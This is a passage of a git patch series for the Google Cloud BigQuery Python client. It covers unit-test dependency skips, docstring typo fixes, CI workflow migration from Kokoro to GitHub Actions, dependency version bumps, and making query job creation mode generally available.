""" + pytest.importorskip("google.cloud.bigquery_storage_v1") from google.cloud.bigquery import dataset from google.cloud.bigquery import table import google.cloud.bigquery_storage_v1.reader diff --git a/tests/unit/test__pyarrow_helpers.py b/tests/unit/test__pyarrow_helpers.py index 06fc2eb85..c12a526de 100644 --- a/tests/unit/test__pyarrow_helpers.py +++ b/tests/unit/test__pyarrow_helpers.py @@ -14,7 +14,7 @@ import pytest - +numpy = pytest.importorskip("numpy") pyarrow = pytest.importorskip("pyarrow", minversion="3.0.0") diff --git a/tests/unit/test_dbapi__helpers.py b/tests/unit/test_dbapi__helpers.py index 7e1da0034..9907df97b 100644 --- a/tests/unit/test_dbapi__helpers.py +++ b/tests/unit/test_dbapi__helpers.py @@ -210,6 +210,7 @@ def test_empty_iterable(self): self.assertEqual(list(result), []) def test_non_empty_iterable(self): + pytest.importorskip("numpy") pytest.importorskip("pyarrow") from tests.unit.helpers import _to_pyarrow diff --git a/tests/unit/test_magics.py b/tests/unit/test_magics.py index a9a12283b..814150693 100644 --- a/tests/unit/test_magics.py +++ b/tests/unit/test_magics.py @@ -1276,6 +1276,11 @@ def test_bigquery_magic_with_no_query_cache(monkeypatch): bigquery.load_ipython_extension(ip) conn = make_connection() monkeypatch.setattr(magics.context, "_connection", conn) + monkeypatch.setattr( + magics.context, + "credentials", + mock.create_autospec(google.auth.credentials.Credentials, instance=True), + ) monkeypatch.setattr(magics.context, "project", "project-from-context") # --no_query_cache option should override context. 
diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 4791c6511..eb2c8d9ec 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2416,6 +2416,7 @@ def test_to_arrow_error_if_pyarrow_is_none(self): row_iterator.to_arrow() def test_to_arrow(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip("pyarrow") row_iterator = self._make_one() tbl = row_iterator.to_arrow() @@ -2423,6 +2424,7 @@ def test_to_arrow(self): self.assertEqual(tbl.num_rows, 0) def test_to_arrow_iterable(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3089,6 +3091,7 @@ def test_to_arrow_iterable_w_bqstorage(self): bqstorage_client._transport.grpc_channel.close.assert_not_called() def test_to_arrow(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3173,6 +3176,7 @@ def test_to_arrow(self): ) def test_to_arrow_w_nulls(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3209,6 +3213,7 @@ def test_to_arrow_w_nulls(self): self.assertEqual(ages, [32, 29, None, 111]) def test_to_arrow_w_unknown_type(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3254,6 +3259,7 @@ def test_to_arrow_w_unknown_type(self): self.assertTrue(all("sport" in str(warning) for warning in warned)) def test_to_arrow_w_empty_table(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3295,6 +3301,7 @@ def test_to_arrow_w_empty_table(self): self.assertEqual(child_field.type.value_type[1].name, "age") def test_to_arrow_max_results_w_explicit_bqstorage_client_warning(self): + pytest.importorskip("numpy") pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery.schema 
import SchemaField @@ -3337,6 +3344,7 @@ def test_to_arrow_max_results_w_explicit_bqstorage_client_warning(self): mock_client._ensure_bqstorage_client.assert_not_called() def test_to_arrow_max_results_w_create_bqstorage_client_no_warning(self): + pytest.importorskip("numpy") pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery.schema import SchemaField @@ -3375,6 +3383,7 @@ def test_to_arrow_max_results_w_create_bqstorage_client_no_warning(self): mock_client._ensure_bqstorage_client.assert_not_called() def test_to_arrow_w_bqstorage(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -3458,6 +3467,7 @@ def test_to_arrow_w_bqstorage(self): bqstorage_client._transport.grpc_channel.close.assert_not_called() def test_to_arrow_w_bqstorage_creates_client(self): + pytest.importorskip("numpy") pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -3491,6 +3501,7 @@ def test_to_arrow_w_bqstorage_creates_client(self): bqstorage_client._transport.grpc_channel.close.assert_called_once() def test_to_arrow_ensure_bqstorage_client_wo_bqstorage(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip( "pyarrow", minversion=self.PYARROW_MINIMUM_VERSION ) @@ -3524,6 +3535,7 @@ def mock_verify_version(raise_if_error: bool = False): self.assertEqual(tbl.num_rows, 2) def test_to_arrow_w_bqstorage_no_streams(self): + pytest.importorskip("numpy") pyarrow = pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -3563,6 +3575,7 @@ def test_to_arrow_w_bqstorage_no_streams(self): self.assertEqual(actual_table.schema[2].name, "colB") def test_to_arrow_progress_bar(self): + pytest.importorskip("numpy") pytest.importorskip("pyarrow") pytest.importorskip("tqdm") 
pytest.importorskip("tqdm.notebook") @@ -3696,6 +3709,7 @@ def test_to_dataframe_iterable_with_dtypes(self): self.assertEqual(df_2["age"][0], 33) def test_to_dataframe_iterable_w_bqstorage(self): + pytest.importorskip("numpy") pandas = pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") pytest.importorskip("google.cloud.bigquery_storage") @@ -3770,6 +3784,7 @@ def test_to_dataframe_iterable_w_bqstorage(self): bqstorage_client._transport.grpc_channel.close.assert_not_called() def test_to_dataframe_iterable_w_bqstorage_max_results_warning(self): + pytest.importorskip("numpy") pandas = pytest.importorskip("pandas") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -4513,7 +4528,7 @@ def test_to_dataframe_w_none_dtypes_mapper(self): def test_to_dataframe_w_unsupported_dtypes_mapper(self): pytest.importorskip("pandas") - import numpy + numpy = pytest.importorskip("numpy") from google.cloud.bigquery.schema import SchemaField schema = [ @@ -4797,6 +4812,7 @@ def test_to_dataframe_max_results_w_create_bqstorage_client_no_warning(self): mock_client._ensure_bqstorage_client.assert_not_called() def test_to_dataframe_w_bqstorage_creates_client(self): + pytest.importorskip("numpy") pytest.importorskip("pandas") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -4830,6 +4846,7 @@ def test_to_dataframe_w_bqstorage_creates_client(self): bqstorage_client._transport.grpc_channel.close.assert_called_once() def test_to_dataframe_w_bqstorage_no_streams(self): + pytest.importorskip("numpy") pytest.importorskip("pandas") pytest.importorskip("google.cloud.bigquery_storage") from google.cloud.bigquery import schema @@ -4858,6 +4875,7 @@ def test_to_dataframe_w_bqstorage_no_streams(self): self.assertTrue(got.empty) def test_to_dataframe_w_bqstorage_logs_session(self): + pytest.importorskip("numpy") pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") 
pytest.importorskip("pyarrow") @@ -4882,6 +4900,7 @@ def test_to_dataframe_w_bqstorage_logs_session(self): ) def test_to_dataframe_w_bqstorage_empty_streams(self): + pytest.importorskip("numpy") pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -4936,6 +4955,7 @@ def test_to_dataframe_w_bqstorage_empty_streams(self): self.assertTrue(got.empty) def test_to_dataframe_w_bqstorage_nonempty(self): + pytest.importorskip("numpy") pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -5018,6 +5038,7 @@ def test_to_dataframe_w_bqstorage_nonempty(self): bqstorage_client._transport.grpc_channel.close.assert_not_called() def test_to_dataframe_w_bqstorage_multiple_streams_return_unique_index(self): + pytest.importorskip("numpy") bigquery_storage = pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -5070,6 +5091,7 @@ def test_to_dataframe_w_bqstorage_multiple_streams_return_unique_index(self): self.assertTrue(got.index.is_unique) def test_to_dataframe_w_bqstorage_updates_progress_bar(self): + pytest.importorskip("numpy") bigquery_storage = pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -5147,6 +5169,7 @@ def blocking_to_arrow(*args, **kwargs): tqdm_mock().close.assert_called_once() def test_to_dataframe_w_bqstorage_exits_on_keyboardinterrupt(self): + pytest.importorskip("numpy") bigquery_storage = pytest.importorskip("google.cloud.bigquery_storage") pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -5322,6 +5345,7 @@ def test_to_dataframe_w_bqstorage_snapshot(self): row_iterator.to_dataframe(bqstorage_client) def test_to_dataframe_concat_categorical_dtype_w_pyarrow(self): + pytest.importorskip("numpy") pytest.importorskip("google.cloud.bigquery_storage") 
pandas = pytest.importorskip("pandas") pyarrow = pytest.importorskip("pyarrow") @@ -5604,7 +5628,7 @@ def test_rowiterator_to_geodataframe_delegation(self, to_dataframe): """ pandas = pytest.importorskip("pandas") geopandas = pytest.importorskip("geopandas") - import numpy + numpy = pytest.importorskip("numpy") from shapely import wkt row_iterator = self._make_one_from_data( diff --git a/tests/unit/test_table_arrow.py b/tests/unit/test_table_arrow.py index 830c4ceb7..fdd1b7b78 100644 --- a/tests/unit/test_table_arrow.py +++ b/tests/unit/test_table_arrow.py @@ -18,7 +18,8 @@ import google.cloud.bigquery.table -pyarrow = pytest.importorskip("pyarrow", minversion="3.0.0") +pytest.importorskip("numpy") +pytest.importorskip("pyarrow", minversion="3.0.0") def test_to_arrow_with_jobs_query_response(): From 9b5ee78f046d9ca3f758eeca6244b8485fe35875 Mon Sep 17 00:00:00 2001 From: Dan Lee <71398022+dandhlee@users.noreply.github.com> Date: Tue, 20 May 2025 10:46:23 -0400 Subject: [PATCH 110/202] docs: update query.py (#2192) Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/job/query.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index f9b99b7fb..954a46963 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1529,7 +1529,7 @@ def result( # type: ignore # (incompatible with supertype) a DDL query, an ``_EmptyRowIterator`` instance is returned. Raises: - google.cloud.exceptions.GoogleAPICallError: + google.api_core.exceptions.GoogleAPICallError: If the job failed and retries aren't successful. concurrent.futures.TimeoutError: If the job did not complete in the given timeout. 
From bfa95f1469481c682e990743cc8b7025fb0facd1 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 20 May 2025 13:56:30 -0400 Subject: [PATCH 111/202] ci: adds new github workflow focused on documentation in prep to deprecate kokoro presubmit (#2194) * I've created a new workflow for the docs and docsfx nox sessions. This involves a new GitHub workflow located in `.github/workflows/docs.yml`. This new workflow will now handle running the `docs` and `docsfx` nox sessions, which were previously managed by the `.kokoro/presubmit/presubmit.cfg` workflow. Here's how the new workflow operates: - It activates when you make pull requests to the `main` branch. - It executes two jobs: `docs` and `docsfx`. - Both of these jobs utilize Python 3.10. - Each job installs nox and then runs its corresponding nox session (`docs-3.10` or `docsfx-3.10`). This adjustment is a step towards phasing out and removing the `.kokoro/presubmit/presubmit.cfg` file. * Update .github/workflows/docs.yml * Update .github/workflows/docs.yml --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- .github/workflows/docs.yml | 39 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 .github/workflows/docs.yml diff --git a/.github/workflows/docs.yml b/.github/workflows/docs.yml new file mode 100644 index 000000000..9372faac2 --- /dev/null +++ b/.github/workflows/docs.yml @@ -0,0 +1,39 @@ +on: + pull_request: + branches: + - main +name: docs +jobs: + docs: + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: '3.10' + - name: Install nox + run: | + python -m pip install --upgrade setuptools pip wheel + python -m pip install nox + - name: Run docs session + run: | + nox -s docs-3.10 + + docfx: + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Python + uses: 
actions/setup-python@v5 + with: + python-version: '3.10' + - name: Install nox + run: | + python -m pip install --upgrade setuptools pip wheel + python -m pip install nox + - name: Run docfx session + run: | + nox -s docfx-3.10 From 12490f2f03681516465fc34217dcdf57000f6fdd Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 21 May 2025 16:20:17 +0200 Subject: [PATCH 112/202] fix(deps): update all dependencies (#2184) * fix(deps): update all dependencies * Update pyproject.toml * Update .github/workflows/docs.yml * Update .github/workflows/docs.yml --------- Co-authored-by: Chalmer Lowe --- samples/desktopapp/requirements-test.txt | 2 +- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 6 +++--- samples/magics/requirements-test.txt | 2 +- samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements-test.txt | 2 +- samples/notebooks/requirements.txt | 4 ++-- samples/snippets/requirements-test.txt | 2 +- samples/snippets/requirements.txt | 2 +- 9 files changed, 13 insertions(+), 13 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 6abea3b4d..cc71ee426 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.2 +google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index 743d0fe35..4a5b75346 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ -google-cloud-bigquery==3.32.0 +google-cloud-bigquery==3.33.0 google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 434a594cb..3b1a3ef54 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -3,7 +3,7 @@ certifi==2025.4.26 cffi==1.17.1 charset-normalizer==3.4.2 
click===8.1.8; python_version == '3.9' -click==8.2.0; python_version >= '3.10' +click==8.2.1; python_version >= '3.10' click-plugins==1.1.1 cligj==0.7.2 db-dtypes==1.4.3 @@ -12,7 +12,7 @@ geojson==3.2.0 geopandas==1.0.1 google-api-core==2.24.2 google-auth==2.40.1 -google-cloud-bigquery==3.32.0 +google-cloud-bigquery==3.33.0 google-cloud-bigquery-storage==2.31.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 @@ -36,7 +36,7 @@ PyYAML==6.0.2 requests==2.32.3 rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' -Shapely==2.1.0; python_version >= '3.10' +Shapely==2.1.1; python_version >= '3.10' six==1.17.0 typing-extensions==4.13.2 typing-inspect==0.9.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 6abea3b4d..cc71ee426 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.2 +google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index bb60f2a67..7d0c91e3d 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ -bigquery_magics==0.9.0 +bigquery_magics==0.10.0 db-dtypes==1.4.3 -google.cloud.bigquery==3.32.0 +google.cloud.bigquery==3.33.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1 pandas==2.2.3 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 6abea3b4d..cc71ee426 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.2 +google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 17f43bf78..9f131e5b8 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,6 +1,6 @@ -bigquery-magics==0.9.0 
+bigquery-magics==0.10.0 db-dtypes==1.4.3 -google-cloud-bigquery==3.32.0 +google-cloud-bigquery==3.33.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1; python_version == '3.9' ipython==9.2.0; python_version >= '3.10' diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 6760e1228..503324cb0 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" -google-cloud-testutils==1.6.2 +google-cloud-testutils==1.6.4 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/snippets/requirements.txt b/samples/snippets/requirements.txt index c31815d69..dae43eff3 100644 --- a/samples/snippets/requirements.txt +++ b/samples/snippets/requirements.txt @@ -1,2 +1,2 @@ # samples/snippets should be runnable with no "extras" -google-cloud-bigquery==3.32.0 +google-cloud-bigquery==3.33.0 From 4379b3df0f4c5e0ac1d8308500306b4ec5c99dee Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 22 May 2025 13:01:13 -0400 Subject: [PATCH 113/202] ddocs: fixes several typos and updates a try except block (#2197) --- google/cloud/bigquery/_helpers.py | 2 +- google/cloud/bigquery/_pandas_helpers.py | 2 +- google/cloud/bigquery/client.py | 2 +- google/cloud/bigquery/table.py | 4 ++-- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index 76c4f1fbd..c7d7705e0 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -388,7 +388,7 @@ def range_to_py(self, value, field): class DataFrameCellDataParser(CellDataParser): - """Override of CellDataParser to handle differences in expection of values in DataFrame-like outputs. + """Override of CellDataParser to handle differences in expression of values in DataFrame-like outputs. 
This is used to turn the output of the REST API into a pyarrow Table, emulating the serialized arrow from the BigQuery Storage Read API. diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 6691e7ef6..10a5c59bb 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -1144,7 +1144,7 @@ def determine_requested_streams( """ if preserve_order: - # If preserve order is set, it takes precendence. + # If preserve order is set, it takes precedence. # Limit the requested streams to 1, to ensure that order # is preserved) return 1 diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 8ad1586f4..067b389a5 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -4134,7 +4134,7 @@ def _list_rows_from_query_results( rows that were affected. query (Optional[str]): The query text used. - total_bytes_processed (Optinal[int]): + total_bytes_processed (Optional[int]): total bytes processed from job statistics, if present. Returns: diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 3f472c490..3b1334bd3 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -44,7 +44,7 @@ import geopandas # type: ignore except ImportError: geopandas = None -else: +finally: _COORDINATE_REFERENCE_SYSTEM = "EPSG:4326" try: @@ -1786,7 +1786,7 @@ class RowIterator(HTTPIterator): the first page is requested. query (Optional[str]): The query text used. - total_bytes_processed (Optinal[int]): + total_bytes_processed (Optional[int]): total bytes processed from job statistics, if present. """ From cc6310819290c8d3362f96c73d2373d3d4f1b44d Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 22 May 2025 16:20:44 -0400 Subject: [PATCH 114/202] ci: Remove unit tests and doc tests from kokoro presubmit. (#2195) * The message is a commit message, not a message to a user from an AI agent. 
Therefore, it should be output as is. Output: Remove Kokoro presubmit for unit, docs, and coverage. This commit removes the Kokoro presubmit configuration that runs `unit_noextras`, `unit`, `cover`, `docs`, and `docfx` nox sessions. These checks are already performed by GitHub Actions, making the Kokoro configuration redundant. The change involves removing the `NOX_SESSION` environment variable definition from `.kokoro/presubmit/presubmit.cfg`. * Update presubmit.cfg * Delete .kokoro/presubmit/presubmit.cfg --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- .kokoro/presubmit/presubmit.cfg | 7 ------- 1 file changed, 7 deletions(-) delete mode 100644 .kokoro/presubmit/presubmit.cfg diff --git a/.kokoro/presubmit/presubmit.cfg b/.kokoro/presubmit/presubmit.cfg deleted file mode 100644 index ac4cc5847..000000000 --- a/.kokoro/presubmit/presubmit.cfg +++ /dev/null @@ -1,7 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -# Disable system tests. -env_vars: { - key: "NOX_SESSION" - value: "unit_noextras unit cover docs docfx" -} From 85ff5b17e590b3c8c9b5bee64d5a69e0c01306ae Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 23 May 2025 10:25:33 -0400 Subject: [PATCH 115/202] ci: Configure Renovate to keep Python at 3.10 for docs workflow (#2199) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Configure Renovate to keep Python at 3.10 for docs workflow This change adds a packageRule to `renovate.json` to prevent Renovate from updating the Python version used in the `.github/workflows/docs.yml` GitHub Actions workflow. The rule specifically targets the `python-version` input of the `actions/setup-python` step and restricts allowed versions to `<3.11`, effectively pinning it to `3.10` for now. 
* 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update renovate.json * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * adds files to excludes lists * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update owlbot.py * adds packageRule about pyproject.toml --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: Owl Bot --- owlbot.py | 3 ++- renovate.json | 9 ++++++++- 2 files changed, 10 insertions(+), 2 deletions(-) diff --git a/owlbot.py b/owlbot.py index 60759adbe..80cf9d6e3 100644 --- a/owlbot.py +++ b/owlbot.py @@ -65,6 +65,7 @@ templated_files, excludes=[ "noxfile.py", + "renovate.json", "docs/multiprocessing.rst", "docs/index.rst", ".coveragerc", @@ -76,7 +77,7 @@ ".kokoro/continuous/prerelease-deps.cfg", ".kokoro/samples/python3.7/**", ".kokoro/samples/python3.8/**", - ".github/workflows", # exclude gh actions as credentials are needed for tests + ".github/workflows/**", # exclude gh actions as credentials are needed for tests "README.rst", ], ) diff --git a/renovate.json b/renovate.json index c7875c469..51eb51d6e 100644 --- a/renovate.json +++ b/renovate.json @@ -8,5 +8,12 @@ "ignorePaths": [".pre-commit-config.yaml", ".kokoro/requirements.txt", "setup.py", ".github/workflows/unittest.yml"], "pip_requirements": { "fileMatch": ["requirements-test.txt", "samples/[\\S/]*constraints.txt", "samples/[\\S/]*constraints-test.txt"] - } + }, + "packageRules": [ + { + "matchFileNames": ["pyproject.toml"], + "matchStrings": ["matplotlib (.*); python_version == '3.9'"], + "allowedVersions": ">= 3.7.1, <= 3.9.2" + } + ] } From a5f98550121e033e887d2ae442b51ede13192a82 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 23 May 2025 10:57:55 -0400 
Subject: [PATCH 116/202] ci: updates renovate.json to ignore docs.yml (#2200) * updates renovate to ignore docs.yml * Update renovate.json --- renovate.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/renovate.json b/renovate.json index 51eb51d6e..3ea143d4c 100644 --- a/renovate.json +++ b/renovate.json @@ -5,7 +5,7 @@ ":preserveSemverRanges", ":disableDependencyDashboard" ], - "ignorePaths": [".pre-commit-config.yaml", ".kokoro/requirements.txt", "setup.py", ".github/workflows/unittest.yml"], + "ignorePaths": [".pre-commit-config.yaml", ".kokoro/requirements.txt", "setup.py", ".github/workflows/unittest.yml", ".github/workflows/docs.yml"], "pip_requirements": { "fileMatch": ["requirements-test.txt", "samples/[\\S/]*constraints.txt", "samples/[\\S/]*constraints-test.txt"] }, From f67852d4f36c12abaca49dca5513382b36622aa0 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 23 May 2025 17:32:50 +0200 Subject: [PATCH 117/202] chore(deps): update dependency google-auth to v2.40.2 (#2196) --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 3b1a3ef54..7a0946fae 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -11,7 +11,7 @@ Fiona==1.10.1 geojson==3.2.0 geopandas==1.0.1 google-api-core==2.24.2 -google-auth==2.40.1 +google-auth==2.40.2 google-cloud-bigquery==3.33.0 google-cloud-bigquery-storage==2.31.0 google-cloud-core==2.4.3 From 28a9994792ec90a6a4d16835faf2137c09c0fb02 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Tue, 27 May 2025 04:38:22 -0500 Subject: [PATCH 118/202] docs: use query_and_wait in the array parameters sample (#2202) --- samples/client_query_w_array_params.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/samples/client_query_w_array_params.py b/samples/client_query_w_array_params.py index 
25592a94a..e9d759f61 100644 --- a/samples/client_query_w_array_params.py +++ b/samples/client_query_w_array_params.py @@ -35,8 +35,8 @@ def client_query_w_array_params() -> None: bigquery.ArrayQueryParameter("states", "STRING", ["WA", "WI", "WV", "WY"]), ] ) - query_job = client.query(query, job_config=job_config) # Make an API request. + rows = client.query_and_wait(query, job_config=job_config) # Make an API request. - for row in query_job: + for row in rows: print("{}: \t{}".format(row.name, row.count)) # [END bigquery_query_params_arrays] From 64cd39fb395c4a03ef6d2ec8261e1709477b2186 Mon Sep 17 00:00:00 2001 From: shollyman Date: Tue, 27 May 2025 10:53:49 -0700 Subject: [PATCH 119/202] feat: job creation mode GA (#2190) * feat: job creation mode GA This PR makes the underlying functionality related to how queries can optionally avoid job creation a GA feature. It does the following: * no longer uses the preview QUERY_PREVIEW_ENABLED environment variable to control job creation * adds a new argument to Client instantiation to control job creation mode * adds a property/setter to Client to control job creation mode This PR also updates/renames the sample demonstrating how to leverage job creation mode with Client.query_and_wait. 
--- google/cloud/bigquery/_job_helpers.py | 12 ++-------- google/cloud/bigquery/client.py | 22 +++++++++++------ google/cloud/bigquery/enums.py | 19 +++++++++++++++ ...rtmode.py => client_query_job_optional.py} | 24 +++++++++++-------- ...e.py => test_client_query_job_optional.py} | 6 ++--- tests/unit/test__job_helpers.py | 12 +++++----- tests/unit/test_client.py | 11 +++++++++ 7 files changed, 70 insertions(+), 36 deletions(-) rename samples/{client_query_shortmode.py => client_query_job_optional.py} (69%) rename samples/tests/{test_client_query_shortmode.py => test_client_query_job_optional.py} (85%) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 4a884ada5..888dc1e73 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -37,7 +37,6 @@ import copy import functools -import os import uuid import textwrap from typing import Any, Dict, Optional, TYPE_CHECKING, Union @@ -400,12 +399,6 @@ def query_and_wait( ) -> table.RowIterator: """Run the query, wait for it to finish, and return the results. - While ``jobCreationMode=JOB_CREATION_OPTIONAL`` is in preview in the - ``jobs.query`` REST API, use the default ``jobCreationMode`` unless - the environment variable ``QUERY_PREVIEW_ENABLED=true``. After - ``jobCreationMode`` is GA, this method will always use - ``jobCreationMode=JOB_CREATION_OPTIONAL``. 
See: - https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/query Args: client: @@ -500,9 +493,8 @@ def query_and_wait( request_body["maxResults"] = min(page_size, max_results) elif page_size is not None or max_results is not None: request_body["maxResults"] = page_size or max_results - - if os.getenv("QUERY_PREVIEW_ENABLED", "").casefold() == "true": - request_body["jobCreationMode"] = "JOB_CREATION_OPTIONAL" + if client.default_job_creation_mode: + request_body["jobCreationMode"] = client.default_job_creation_mode def do_query(): request_body["requestId"] = make_job_id() diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 067b389a5..c6873545b 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -221,6 +221,10 @@ class Client(ClientWithProject): client_options (Optional[Union[google.api_core.client_options.ClientOptions, Dict]]): Client options used to set user options on the client. API Endpoint should be set through client_options. + default_job_creation_mode (Optional[str]): + Sets the default job creation mode used by query methods such as + query_and_wait(). For lightweight queries, JOB_CREATION_OPTIONAL is + generally recommended. Raises: google.auth.exceptions.DefaultCredentialsError: @@ -243,6 +247,7 @@ def __init__( client_options: Optional[ Union[google.api_core.client_options.ClientOptions, Dict[str, Any]] ] = None, + default_job_creation_mode: Optional[str] = None, ) -> None: if client_options is None: client_options = {} @@ -277,6 +282,7 @@ def __init__( self._connection = Connection(self, **kw_args) self._location = location self._default_load_job_config = copy.deepcopy(default_load_job_config) + self.default_job_creation_mode = default_job_creation_mode # Use property setter so validation can run. 
